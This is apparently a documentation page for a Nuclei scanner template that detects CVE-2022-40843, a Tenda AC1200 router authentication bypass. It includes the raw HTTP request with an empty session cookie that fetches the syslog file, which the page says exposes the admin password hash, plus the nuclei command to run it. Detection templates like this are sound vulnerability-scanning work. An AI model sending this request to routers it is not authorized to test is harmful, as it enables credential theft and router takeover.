Tenda AC1200 V-W15Ev2 - Authentication Bypass
ID: CVE-2022-40843
Severity: medium
Author: gy741
Tags: cve2022,cve,tenda,auth-bypass,router,iot
Description
Section titled “Description”The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router’s login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router’s file, which contains the MD5 password of the Administrator’s user account. This vulnerability exists within the local web and hosted remote management console.
YAML Source
Section titled “YAML Source”id: CVE-2022-40843
info: name: Tenda AC1200 V-W15Ev2 - Authentication Bypass author: gy741 severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. impact: | Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://boschko.ca/tenda_ac1200_router - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 epss-score: 0.37501 epss-percentile: 0.97193 cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tenda product: ac1200_v-w15ev2 tags: cve2022,cve,tenda,auth-bypass,router,iot
http: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1 Host: {{Hostname}} Cookie: W15Ev2_user=
matchers-condition: and matchers: - type: regex regex: - '^0\d{3}$'
- type: word part: body words: - "[system]" - "[error]" - "[wan1]" condition: or
- type: word part: header words: - "Content-type: config/conf"
- type: status status: - 200# digest: 4b0a00483046022100fa6a9f104c0c0362c7c0a60aaae49a8fc1826d83554e3fb999d6448ff3de11c0022100fb52d166a96b921d4923b2939053827c968855b7bef313914b6a1a3d840f6c1d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40843.yaml"